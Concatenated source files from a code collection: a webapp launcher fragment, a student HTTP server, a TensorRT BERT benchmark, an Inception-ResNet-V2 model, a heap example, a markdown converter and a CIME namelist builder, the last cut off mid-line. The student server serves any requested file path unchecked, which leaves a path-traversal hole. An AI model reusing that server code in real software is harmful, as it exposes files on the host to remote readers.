logging.info('Will build model from static file')
attack_dict = os.path.abspath(json_file_path)
# Check int parameters are ints
int_error = '%s config set incorrectly: expected a number'
try:
if queue_limit < 1:
queue_limit = None
except TypeError:
raise ValueError(int_error % 'queue_limit')
try:
max_tasks = max(1, max_tasks)
except TypeError:
raise ValueError(int_error % 'max-analysis-tasks')
try:
int(port)
except ValueError:
raise ValueError(int_error % 'port')
# Determine DB engine to use
db_obj = None
if db_conf == DB_SQLITE:
from threadcomponents.database.thread_sqlite3 import ThreadSQLite
db_obj = ThreadSQLite(os.path.join(dir_prefix, 'threadcomponents', 'database', 'thread.db'))
elif db_conf == DB_POSTGRESQL:
# Import here to avoid PostgreSQL requirements needed for non-PostgreSQL use
from threadcomponents.database.thread_postgresql import ThreadPostgreSQL
db_obj = ThreadPostgreSQL()
# Initialise DAO, start services and initiate main function
dao = Dao(engine=db_obj)
web_svc = WebService(route_prefix=route_prefix, is_local=is_local)
reg_svc = RegService(dao=dao)
data_svc = DataService(dao=dao, web_svc=web_svc, dir_prefix=dir_prefix)
ml_svc = MLService(web_svc=web_svc, dao=dao, dir_prefix=dir_prefix)
rest_svc = RestService(web_svc, reg_svc, data_svc, ml_svc, dao, dir_prefix=dir_prefix, queue_limit=queue_limit,
max_tasks=max_tasks)
services = dict(dao=dao, data_svc=data_svc, ml_svc=ml_svc, reg_svc=reg_svc, web_svc=web_svc, rest_svc=rest_svc)
website_handler = WebAPI(services=services, js_src=js_src)
start(host, port, taxii_local=taxii_local, build=conf_build, json_file=attack_dict, app_setup_func=app_setup_func)
if __name__ == '__main__':
# Help information for the program
parser = argparse.ArgumentParser(description='Launch the Thread webapp.')
parser.add_argument('--build-db', action='store_true', help='builds the (PostgreSQL) database')
parser.add_argument('--schema', help='the schema file to use if --build-db option is used')
args = vars(parser.parse_args())
if args.get('build_db'):
schema = args.get('schema')
# Import here to avoid PostgreSQL requirements needed for non-PostgreSQL use
from threadcomponents.database.thread_postgresql import build_db as build_postgresql
build_postgresql() if schema is None else build_postgresql(schema)
else:
main()
|
the-stack_106_22131
|
'''
CSCI 379 Programming Assignment 2
By Antonina Serdyukova
With help of this tutorial https://ruslanspivak.com/lsbaws-part3/
'''
import errno
import os
import sys
import signal
import socket
import datetime
import time
if len(sys.argv) > 1:
p = int(sys.argv[1])
else:
p = 80
SERVER_ADDRESS = (HOST, PORT) = '', p
REQUEST_QUEUE_SIZE = 1024
def grim_reaper(signum, frame):
while True:
try:
pid, status = os.waitpid(
-1, # Wait for any child process
os.WNOHANG # Do not block and return EWOULDBLOCK error
)
except OSError:
return
if pid == 0: # no more zombies
return
def get_file(path, br_type, sys_type):
try:
path = path[1:]
f = open(path,'r')
l = f.read(1024)
data = ''
while (l):
data += l
l = f.read(1024)
f.close()
data = data.replace('index.html"', path + '" from ' + br_type + ' running on ' + sys_type)
return data
except FileNotFoundError:
f = open('404.html','r')
l = f.read(1024)
data = ''
while (l):
data += l
l = f.read(1024)
f.close()
return data
def map_os(line):
os_list = [
'Windows 3.11',
'Windows 95',
'Windows 98',
'Windows 2000',
'Windows XP',
'Windows Server 2003',
'Windows Vista',
'Windows 7',
'Windows 8',
'Windows 10',
'Windows NT 4.0',
'Windows ME',
'Open BSD',
'Sun OS',
'Linux',
'Mac OS',
'QNX',
'BeOS',
'OS/2',
'Search Bot'
]
ua_list = [
['Win16'],
['Windows 95','Win95','Windows_95'],
['Windows 98','Win98'],
['Windows NT 5.0','Windows 2000'],
['Windows NT 5.1','Windows XP'],
['Windows NT 5.2'],
['Windows NT 6.0'],
['Windows NT 6.1'],
['Windows NT 6.2'],
['Windows NT 10.0'],
['Windows NT 4.0','WinNT4.0','WinNT','Windows NT'],
['Windows ME'],
['OpenBSD'],
['SunOS'],
['Linux','X11'],
['Mac_PowerPC','Macintosh'],
['QNX'],
['BeOS'],
['OS/2'],
['nuhk','Googlebot','Yammybot','Openbot','Slurp','MSNBot','Ask Jeeves/Teoma','ia_archiver']
]
i = 0
for ua_vals in ua_list:
for ua_val in ua_vals:
if ua_val in line:
return os_list[i]
i += 1
return 'OS not detected'
def map_browser(line):
br_name = [
'Firefox',
'Seamonkey',
'Chrome',
'Chromium',
'Safari',
'Opera',
'Internet Explorer'
]
ua_str = [
['Firefox'],
['Seamonkey'],
['Chrome'],
['Chromium'],
['Safari'],
['OPR', 'Opera'],
['MSIE']
]
i = 0
for ua_s in ua_str:
for ua in ua_s:
if ua in line:
return br_name[i]
i += 1
return 'Browser not detected'
def detect_system(lines):
info = []
for line in lines:
if 'User-Agent' in line:
return map_browser(line), map_os(line)
return 'System information is not available'
def hist(addr, path):
try:
f = open('ip-log.txt','a+')
c = open('ip-log.txt','r')
contents = c.read()
if addr not in contents:
f.write(addr + '\n')
p = open(str(addr),'a+')
cp = open(str(addr), 'r')
cont = cp.read()
p.write(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') + '\t' + path + '\n')
cp.close()
p.close()
c.close()
f.close()
except FileNotFoundError:
print('Error opening the file in hist()')
def get_history(addr):
try:
f = open(str(addr), 'r')
contents = f.readlines()
h = open('history.html','r')
l = h.read(1024)
data = ''
while (l):
data += l
l = h.read(1024)
h.close()
f.close()
data = data.replace('No history', '<br>'.join(contents))
return data
except FileNotFoundError:
print('Error opening the file in get_history()')
def handle_request(client_connection, client_address):
try:
request = client_connection.recv(1024)
reqstr = request.decode()
first_line = reqstr.splitlines()[0]
all_lines = reqstr.splitlines()
browser_type, system_type = detect_system(all_lines)
req_type = first_line.split()[0]
path = first_line.split()[1]
hist(client_address, path)
if req_type == 'GET':
http_response = 'HTTP/1.1 200 OK\nContent-Type: text/html\n\n'
client_connection.sendall(http_response.encode())
if path == '/':
data = get_file('/index.html', browser_type, system_type)
elif path == '/history.html':
data = get_history(client_address)
else:
data = get_file(path, browser_type, system_type)
client_connection.sendall(data.encode())
else:
http_response = 'HTTP/1.1 404 NotFound\nContent-Type: text/html\n\n'
client_connection.sendall(http_response.encode())
data = get_file('404.html', browser_type, system_type)
client_connection.sendall(data.encode())
except IndexError:
pass
def serve_forever():
listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_socket.bind(SERVER_ADDRESS)
listen_socket.listen(REQUEST_QUEUE_SIZE)
print('Serving HTTP on port {port} ...'.format(port=PORT))
signal.signal(signal.SIGCHLD, grim_reaper)
while True:
try:
client_connection, client_address = listen_socket.accept()
except IOError as e:
code, msg = e.args
# restart 'accept' if it was interrupted
if code == errno.EINTR:
continue
else:
raise
pid = os.fork()
if pid == 0: # child
listen_socket.close() # close child listen socket copy
handle_request(client_connection, client_address[0])
client_connection.close()
os._exit(0)
else: # parent
client_connection.close() # close parent copy and loop over
if __name__ == '__main__':
serve_forever()
|
the-stack_106_22134
|
#
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import ctypes
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import numpy as np
TRT_LOGGER = trt.Logger(trt.Logger.ERROR)
class DeviceBuffer(object):
def __init__(self, shape, dtype=trt.int32):
self.buf = cuda.mem_alloc(trt.volume(shape) * dtype.itemsize)
def binding(self):
return int(self.buf)
def free(self):
self.buf.free()
def main():
parser = argparse.ArgumentParser(description='BERT Inference Benchmark')
parser.add_argument("-e", "--engine", help='Path to BERT TensorRT engine')
parser.add_argument('-b', '--batch-size', default=[], action="append", help='Batch size(s) to benchmark. Can be specified multiple times for more than one batch size. This script assumes that the engine has been built with one optimization profile for each batch size, and that these profiles are in order of increasing batch size.', type=int)
parser.add_argument('-s', '--sequence-length', default=128, help='Sequence length of the BERT model', type=int)
parser.add_argument('-i', '--iterations', default=200, help='Number of iterations to run when benchmarking each batch size.', type=int)
parser.add_argument('-w', '--warm-up-runs', default=10, help='Number of iterations to run prior to benchmarking.', type=int)
parser.add_argument('-r', '--random-seed', required=False, default=12345, help='Random seed.', type=int)
args, _ = parser.parse_known_args()
args.batch_size = args.batch_size or [1]
# Import necessary plugins for BERT TensorRT
ctypes.CDLL("libnvinfer_plugin.so", mode=ctypes.RTLD_GLOBAL)
with open(args.engine, 'rb') as f, trt.Runtime(TRT_LOGGER) as runtime, runtime.deserialize_cuda_engine(f.read()) as engine, engine.create_execution_context() as context:
# Allocate buffers large enough to store the largest batch size
max_input_shape = (args.sequence_length * max(args.batch_size), )
max_output_shape = (args.sequence_length * max(args.batch_size), 2, 1, 1)
buffers = [
DeviceBuffer(max_input_shape),
DeviceBuffer(max_input_shape),
DeviceBuffer((max(args.batch_size) + 1, )),
DeviceBuffer((args.sequence_length, )),
DeviceBuffer(max_output_shape)
]
# Prepare random input
pseudo_vocab_size = 30522
pseudo_type_vocab_size = 2
np.random.seed(args.random_seed)
test_word_ids = np.random.randint(0, pseudo_vocab_size, (args.sequence_length * max(args.batch_size)), dtype=np.int32)
test_segment_ids = np.random.randint(0, pseudo_type_vocab_size, (args.sequence_length * max(args.batch_size)), dtype=np.int32)
test_cu_seq_lens = np.arange(0, args.sequence_length * max(args.batch_size) + 1, args.sequence_length, dtype=np.int32)
# Copy input h2d
cuda.memcpy_htod(buffers[0].buf, test_word_ids.ravel())
cuda.memcpy_htod(buffers[1].buf, test_segment_ids.ravel())
cuda.memcpy_htod(buffers[2].buf, test_cu_seq_lens.ravel())
bench_times = {}
for idx, batch_size in enumerate(sorted(args.batch_size)):
context.active_optimization_profile = 0
# Each profile has unique bindings
bindings = [buf.binding() for buf in buffers]
shapes = {
"input_ids": (args.sequence_length * batch_size, ),
"segment_ids": (args.sequence_length * batch_size, ),
"cu_seqlens": (batch_size + 1, ),
"max_seqlen": (args.sequence_length, ),
}
for binding, shape in shapes.items():
context.set_binding_shape(engine[binding], shape)
assert context.all_binding_shapes_specified
# Inference
total_time = 0
start = cuda.Event()
end = cuda.Event()
stream = cuda.Stream()
# Warmup
for _ in range(args.warm_up_runs):
context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
stream.synchronize()
# Timing loop
times = []
for _ in range(args.iterations):
start.record(stream)
context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
end.record(stream)
stream.synchronize()
times.append(end.time_since(start))
# Compute average time, 95th percentile time and 99th percentile time.
bench_times[batch_size] = times
[b.free() for b in buffers]
for batch_size, times in bench_times.items():
total_time = sum(times)
avg_time = total_time / float(len(times))
times.sort()
percentile95 = times[int(len(times) * 0.95)]
percentile99 = times[int(len(times) * 0.99)]
print("Running {:} iterations with Batch Size: {:}\n\tTotal Time: {:} ms \tAverage Time: {:} ms\t95th Percentile Time: {:} ms\t99th Percentile Time: {:}".format(args.iterations, batch_size, total_time, avg_time, percentile95, percentile99))
if __name__ == '__main__':
main()
|
the-stack_106_22135
|
import sys
# add source
sys.path.insert(0, os.path.abspath('./sphinxext'))
sys.path.append('/Users/mdl-admin/Desktop/mdl')
# import package
import imhr
# create image
import matplotlib.pyplot as plt
import matplotlib.image as image
from pathlib import Path
# path
path = '%s/dist/roi/output/img/bounds/'%(Path(imhr.__file__).parent)
# draw plot
#plt.figure(figsize=(20,6), dpi=400, facecolor='#ffffff')
fig, (axes) = plt.subplots(1, 4, sharey=True)
# names
shape = 'hull'
filenames = ['2550_%s.png'%(shape),'2691_%s.png'%(shape),'4640_%s.png'%(shape),'9421_%s.png'%(shape)]
# draw and save
for idx, itm in enumerate(zip(axes, filenames)):
ax, file, = itm
## load roi
im = image.imread('%s/%s'%(path, file))
ax.imshow(im)
ax.grid(True)
ax.set_facecolor('#f9f9f9')
# labels
if idx == 0: ax.set_ylabel('Screen Y (pixels)', fontsize=8)
ax.set_xlabel('Screen X (pixels)', fontsize=8)
ax.tick_params(labelsize=6, width=1, length=4)
# save
#plt.tight_layout()
plt.subplots_adjust(wspace=0.1)
plt.show()
|
the-stack_106_22138
|
""" Pytorch Inception-Resnet-V2 implementation
Sourced from https://github.com/Cadene/tensorflow-model-zoo.torch (MIT License) which is
based upon Google's Tensorflow implementation and pretrained weights (Apache 2.0 License)
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from .registry import register_model
from .helpers import load_pretrained
from .adaptive_avgmax_pool import select_adaptive_pool2d
from .constants import IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD
__all__ = ['InceptionResnetV2']
default_cfgs = {
# ported from http://download.tensorflow.org/models/inception_resnet_v2_2016_08_30.tar.gz
'inception_resnet_v2': {
'url': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/inception_resnet_v2-940b1cd6.pth',
'num_classes': 1001, 'input_size': (3, 299, 299), 'pool_size': (8, 8),
'crop_pct': 0.8975, 'interpolation': 'bicubic',
'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,
'first_conv': 'conv2d_1a.conv', 'classifier': 'classif',
},
# ported from http://download.tensorflow.org/models/ens_adv_inception_resnet_v2_2017_08_18.tar.gz
'ens_adv_inception_resnet_v2': {
'url': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/ens_adv_inception_resnet_v2-2592a550.pth',
'num_classes': 1001, 'input_size': (3, 299, 299), 'pool_size': (8, 8),
'crop_pct': 0.8975, 'interpolation': 'bicubic',
'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,
'first_conv': 'conv2d_1a.conv', 'classifier': 'classif',
}
}
class BasicConv2d(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride, padding=0):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(
in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(out_planes, eps=.001)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class Mixed_5b(nn.Module):
def __init__(self):
super(Mixed_5b, self).__init__()
self.branch0 = BasicConv2d(192, 96, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(192, 48, kernel_size=1, stride=1),
BasicConv2d(48, 64, kernel_size=5, stride=1, padding=2)
)
self.branch2 = nn.Sequential(
BasicConv2d(192, 64, kernel_size=1, stride=1),
BasicConv2d(64, 96, kernel_size=3, stride=1, padding=1),
BasicConv2d(96, 96, kernel_size=3, stride=1, padding=1)
)
self.branch3 = nn.Sequential(
nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False),
BasicConv2d(192, 64, kernel_size=1, stride=1)
)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class Block35(nn.Module):
def __init__(self, scale=1.0):
super(Block35, self).__init__()
self.scale = scale
self.branch0 = BasicConv2d(320, 32, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(320, 32, kernel_size=1, stride=1),
BasicConv2d(32, 32, kernel_size=3, stride=1, padding=1)
)
self.branch2 = nn.Sequential(
BasicConv2d(320, 32, kernel_size=1, stride=1),
BasicConv2d(32, 48, kernel_size=3, stride=1, padding=1),
BasicConv2d(48, 64, kernel_size=3, stride=1, padding=1)
)
self.conv2d = nn.Conv2d(128, 320, kernel_size=1, stride=1)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
out = self.conv2d(out)
out = out * self.scale + x
out = self.relu(out)
return out
class Mixed_6a(nn.Module):
def __init__(self):
super(Mixed_6a, self).__init__()
self.branch0 = BasicConv2d(320, 384, kernel_size=3, stride=2)
self.branch1 = nn.Sequential(
BasicConv2d(320, 256, kernel_size=1, stride=1),
BasicConv2d(256, 256, kernel_size=3, stride=1, padding=1),
BasicConv2d(256, 384, kernel_size=3, stride=2)
)
self.branch2 = nn.MaxPool2d(3, stride=2)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
return out
class Block17(nn.Module):
def __init__(self, scale=1.0):
super(Block17, self).__init__()
self.scale = scale
self.branch0 = BasicConv2d(1088, 192, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(1088, 128, kernel_size=1, stride=1),
BasicConv2d(128, 160, kernel_size=(1, 7), stride=1, padding=(0, 3)),
BasicConv2d(160, 192, kernel_size=(7, 1), stride=1, padding=(3, 0))
)
self.conv2d = nn.Conv2d(384, 1088, kernel_size=1, stride=1)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
out = torch.cat((x0, x1), 1)
out = self.conv2d(out)
out = out * self.scale + x
out = self.relu(out)
return out
class Mixed_7a(nn.Module):
def __init__(self):
super(Mixed_7a, self).__init__()
self.branch0 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 384, kernel_size=3, stride=2)
)
self.branch1 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 288, kernel_size=3, stride=2)
)
self.branch2 = nn.Sequential(
BasicConv2d(1088, 256, kernel_size=1, stride=1),
BasicConv2d(256, 288, kernel_size=3, stride=1, padding=1),
BasicConv2d(288, 320, kernel_size=3, stride=2)
)
self.branch3 = nn.MaxPool2d(3, stride=2)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class Block8(nn.Module):
def __init__(self, scale=1.0, noReLU=False):
super(Block8, self).__init__()
self.scale = scale
self.noReLU = noReLU
self.branch0 = BasicConv2d(2080, 192, kernel_size=1, stride=1)
self.branch1 = nn.Sequential(
BasicConv2d(2080, 192, kernel_size=1, stride=1),
BasicConv2d(192, 224, kernel_size=(1, 3), stride=1, padding=(0, 1)),
BasicConv2d(224, 256, kernel_size=(3, 1), stride=1, padding=(1, 0))
)
self.conv2d = nn.Conv2d(448, 2080, kernel_size=1, stride=1)
if not self.noReLU:
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
out = torch.cat((x0, x1), 1)
out = self.conv2d(out)
out = out * self.scale + x
if not self.noReLU:
out = self.relu(out)
return out
class InceptionResnetV2(nn.Module):
def __init__(self, num_classes=1001, in_chans=3, drop_rate=0., global_pool='avg'):
super(InceptionResnetV2, self).__init__()
self.drop_rate = drop_rate
self.global_pool = global_pool
self.num_classes = num_classes
self.num_features = 1536
self.conv2d_1a = BasicConv2d(in_chans, 32, kernel_size=3, stride=2)
self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.maxpool_3a = nn.MaxPool2d(3, stride=2)
self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
self.maxpool_5a = nn.MaxPool2d(3, stride=2)
self.mixed_5b = Mixed_5b()
self.repeat = nn.Sequential(
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17)
)
self.mixed_6a = Mixed_6a()
self.repeat_1 = nn.Sequential(
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10)
)
self.mixed_7a = Mixed_7a()
self.repeat_2 = nn.Sequential(
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20)
)
self.block8 = Block8(noReLU=True)
self.conv2d_7b = BasicConv2d(2080, self.num_features, kernel_size=1, stride=1)
# NOTE some variants/checkpoints for this model may have 'last_linear' as the name for the FC
self.classif = nn.Linear(self.num_features, num_classes)
def get_classifier(self):
return self.classif
def reset_classifier(self, num_classes, global_pool='avg'):
self.global_pool = global_pool
self.num_classes = num_classes
del self.classif
if num_classes:
self.classif = torch.nn.Linear(self.num_features, num_classes)
else:
self.classif = None
def forward_features(self, x, pool=True):
x = self.conv2d_1a(x)
x = self.conv2d_2a(x)
x = self.conv2d_2b(x)
x = self.maxpool_3a(x)
x = self.conv2d_3b(x)
x = self.conv2d_4a(x)
x = self.maxpool_5a(x)
x = self.mixed_5b(x)
x = self.repeat(x)
x = self.mixed_6a(x)
x = self.repeat_1(x)
x = self.mixed_7a(x)
x = self.repeat_2(x)
x = self.block8(x)
x = self.conv2d_7b(x)
if pool:
x = select_adaptive_pool2d(x, self.global_pool)
#x = F.avg_pool2d(x, 8, count_include_pad=False)
x = x.view(x.size(0), -1)
return x
def forward(self, x):
x = self.forward_features(x, pool=True)
if self.drop_rate > 0:
x = F.dropout(x, p=self.drop_rate, training=self.training)
x = self.classif(x)
return x
@register_model
def inception_resnet_v2(pretrained=False, num_classes=1000, in_chans=3, **kwargs):
r"""InceptionResnetV2 model architecture from the
`"InceptionV4, Inception-ResNet..." <https://arxiv.org/abs/1602.07261>` paper.
"""
default_cfg = default_cfgs['inception_resnet_v2']
model = InceptionResnetV2(num_classes=num_classes, in_chans=in_chans, **kwargs)
model.default_cfg = default_cfg
if pretrained:
load_pretrained(model, default_cfg, num_classes, in_chans)
return model
@register_model
def ens_adv_inception_resnet_v2(pretrained=False, num_classes=1000, in_chans=3, **kwargs):
r""" Ensemble Adversarially trained InceptionResnetV2 model architecture
As per https://arxiv.org/abs/1705.07204 and
https://github.com/tensorflow/models/tree/master/research/adv_imagenet_models.
"""
default_cfg = default_cfgs['ens_adv_inception_resnet_v2']
model = InceptionResnetV2(num_classes=num_classes, in_chans=in_chans, **kwargs)
model.default_cfg = default_cfg
if pretrained:
load_pretrained(model, default_cfg, num_classes, in_chans)
return model
|
the-stack_106_22140
|
# The corresponding complete binary tree for this array of elements [4, 10, 3, 5, 1] will be:
#
# 4
# / \
# 10 3
# / \
# 5 1
#
# Note:
# Root is at index 0 in array.
# Left child of i-th node is at (2*i + 1)th index.
# Right child of i-th node is at (2*i + 2)th index.
# Parent of i-th node is at (i-1)/2 index.
def heapify(arr, n, i):
largest = i
l = (2*i) + 1
r = (2*i) + 2
# If left child is larger than root
if l < n and arr[l] > arr[largest]:
largest = l
# If right child is larger than largest so far
if r < n and arr[r] > arr[largest]:
largest = r
if largest != i:
arr[i], arr[largest] = arr[largest], arr[i]
heapify(arr, n, largest)
def build_heap(arr, n):
start_index = (n//2 - 1)
for i in range(start_index, -1, -1):
heapify(arr, n, i)
def print_heap(arr, n):
print("Array representation of Heap is:")
for i in range(n):
print(arr[i], end=" ")
print()
arr = [1, 3, 5, 4, 6, 13, 10, 9, 8, 15, 17]
n = len(arr)
build_heap(arr, n)
print_heap(arr, n)
|
the-stack_106_22144
|
from typing import Generator, Literal
from app.element.block import Block, ParseResult, CodeBlock, CodeChildBlock
from app.converter.block_converter import BlockConverter
class Converter:
""" 複数行におよぶBlock要素をHTMLタグと対応した形へ変換することを責務に持つ """
def __init__(self):
self._block_converter = BlockConverter()
def convert(self, markdown_result: ParseResult) -> ParseResult:
"""
ビルダの責務を小さくするため、マークダウンのパース結果をビルダが解釈しやすい形へ変換
:param markdown_result: 変換対象のマークダウンパース結果
:return: 変換結果
"""
convert_result_content = []
# コードブロックのような、記法の範囲内を同一とみなす要素をグループ化
# より具体的には、同種のBlock要素へと変換することで、コンバータの処理単位としている
grouped_markdown_result = group_same_range_blocks(markdown_result.content)
# 変換結果を同種のBlock単位へ分割してから変換
# こうすることで、コンバータはただ入力を統合したものを出力するだけでよい
for convert_target in split_to_convert_target(grouped_markdown_result):
convert_result_content += self._block_converter.convert(convert_target)
return ParseResult(content=convert_result_content)
def group_same_range_blocks(blocks: list[Block]) -> list[Block]:
"""
コードブロックのような間も同一のBlock要素とみなすものをグルーピング
:param blocks: マークダウン変換結果
:return: 範囲内を同一とみなすBlock要素がグループ化された結果
"""
# 現在はどの範囲のBlock要素を処理しているか
# モードに応じて範囲内のBlock要素をグループ化
mode: Literal['Block'] | Literal['CodeBlock'] = 'Block'
grouped_blocks = []
for block in blocks:
# コードブロック
# 始点は、言語などの属性を後から参照するため、そのままグループ後のリストへ追加
# 始点
if mode == 'Block' and isinstance(block, CodeBlock):
grouped_blocks.append(block)
mode = 'CodeBlock'
continue
# 中間
if mode == 'CodeBlock' and not isinstance(block, CodeBlock):
grouped_blocks.append(CodeChildBlock(children=block.children))
continue
# 終点
if mode == 'CodeBlock' and isinstance(block, CodeBlock):
mode = 'Block'
continue
grouped_blocks.append(block)
return grouped_blocks
def split_to_convert_target(blocks: list[Block]) -> Generator[list[Block], None, None]:
"""
マークダウンの変換結果をコンバータの変換単位へ分割
:param blocks: マークダウンの変換結果
:return: ループで参照される度、1つのコンバータ変換単位を返却
"""
# 開始・終了のインデックスでリストを分割していくことで、サブリストを生成し、毎回初期化するような
# 煩雑な処理が要らなくなる
start = 0
end = 0
for block in blocks:
# 同種のブロックは同じコンバータで処理できるので、ひとまとめにする
if block.is_same_type(blocks[start]):
end += 1
continue
# Block要素が異なったタイミングで、リストの開始から終了インデックスまでの要素を
# 返却すると、1種類のBlock要素で構成されるサブリストが得られる
# コンバータはこれをまとめて処理していくことで、リスト・引用のような複数行に渡るBlock要素を
# 統合できる
yield blocks[start: end]
start = end
end += 1
# 同じものが続いてループが終了した場合、ループ内のyield文だけではリストの中身全てを
# 返却できないので、残りの要素を返却
if start != end:
yield blocks[start: end]
|
the-stack_106_22145
|
"""
common implementation for building namelist commands
These are used by components/<model_type>/<component>/cime_config/buildnml
"""
from CIME.XML.standard_module_setup import *
from CIME.utils import expect, parse_args_and_handle_standard_logging_options, setup_standard_logging_options
import sys, os, argparse
logger = logging.getLogger(__name__)
###############################################################################
def parse_input(argv):
###############################################################################
parser = argparse.ArgumentParser()
setup_standard_logging_options(parser)
parser.add_argument("caseroot", default=os.getcwd(),
help="Case directory")
args = parse_args_and_handle_standard_logging_options(argv, parser)
return args.caseroot
###############################################################################
#pylint: disable=unused-argument
def build_xcpl_nml(case, caseroot, compname):
###############################################################################
compclasses = case.get_values("COMP_CLASSES")
compclass = None
for compclass in compclasses:
if case.get_value("COMP_{}".format(compclass)) == compname:
break
expect(compclass is not None,
"Could not identify compclass for compname {}".format(compname))
rundir = case.get_value("RUNDIR")
comp_interface = case.get_value("COMP_INTERFACE")
if comp_interface != "nuopc":
ninst = case.get_value("NINST_{}".format(compclass.upper()))
else:
ninst = case.get_value("NINST")
if not ninst:
ninst = 1
nx = case.get_value("{}_NX".format(compclass.upper()))
ny = case.get_value("{}_NY".format(compclass.upper()))
if compname == "xrof":
flood_mode = case.get_value('XROF_FLOOD_MODE')
extras = []
dtype = 1
npes = 0
length = 0
if compname == "xatm":
if ny == 1:
dtype = 2
extras = [["24",
"ncpl number of communications w/coupler per dat"],
["0.0",
"simul time proxy (secs): time between cpl comms"]]
elif compname == "xglc" or compname == "xice":
dtype = 2
elif compname == "xlnd":
dtype = 11
elif compname == "xocn":
dtype = 4
elif compname == "xrof":
dtype = 11
if flood_mode == "ACTIVE":
extras = [[".true.", "flood flag"]]
else:
extras = [[".false.", "flood flag"]]
for i in range(1, ninst + 1):
# If only 1 file, name is 'compclass_in'
# otherwise files are 'compclass_in0001', 'compclass_in0002', etc
if ninst == 1:
filename = os.path.join(rundir, "{}_in".format(compname))
else:
filename = os.path.join(rundir, "{}_in_{:04d}".format(compname, i))
with open(filename, 'w') as infile:
infile.write("{:<20d} ! i-direction global dimension\n".format(nx))
infile.write("{:<20d} ! j-direction global dimension\n".format(ny))
infile.write("{:<20d} ! decomp_type 1=1d-by-lat, 2=1d-by-lon, 3=2d, 4=2d evensquare, 11=segmented\n".format(dtype))
infile.write("{:<20d} ! num of pes for i (type 3 only)\n".format(npes))
infile.write("{:<20d} ! length of segments (type 4 only)\n".format(length))
for extra in extras:
#infile.write("{:-20s} ! {}\n".format(extra[0], extra[1]))
infile.write("{:<20s} ! {}\n".format(extra[0], extra[1]))
###############################################################################
def create_namelist_infile(case, user_nl_file, namelist_infile, infile_text=""):
###############################################################################
lines_input = []
if os.path.isfile(user_nl_file):
with open(user_nl_file, "r") as file_usernl:
lines_input = file_usernl.readlines()
else:
logger.warning("WARNING: No file {} found in case directory".format(user_nl_file))
lines_output = []
lines_output.append("&comp_inparm \n")
if infile_text:
lines_output.append(infile_text)
logger.debug("file_infile {} ".format(infile_text))
for line in lines_input:
match1 = re.search(r"^[\&\/\!]", line)
match2 = re.search(r"\$([\w\_])+", line)
if match1 is None and match2 is not None:
line = case.get_resolved_value(line)
if match1 is None:
lines_output.append(line)
lines_output.append("/ \n")
with open(namelist_infile, "w") as file_infile:
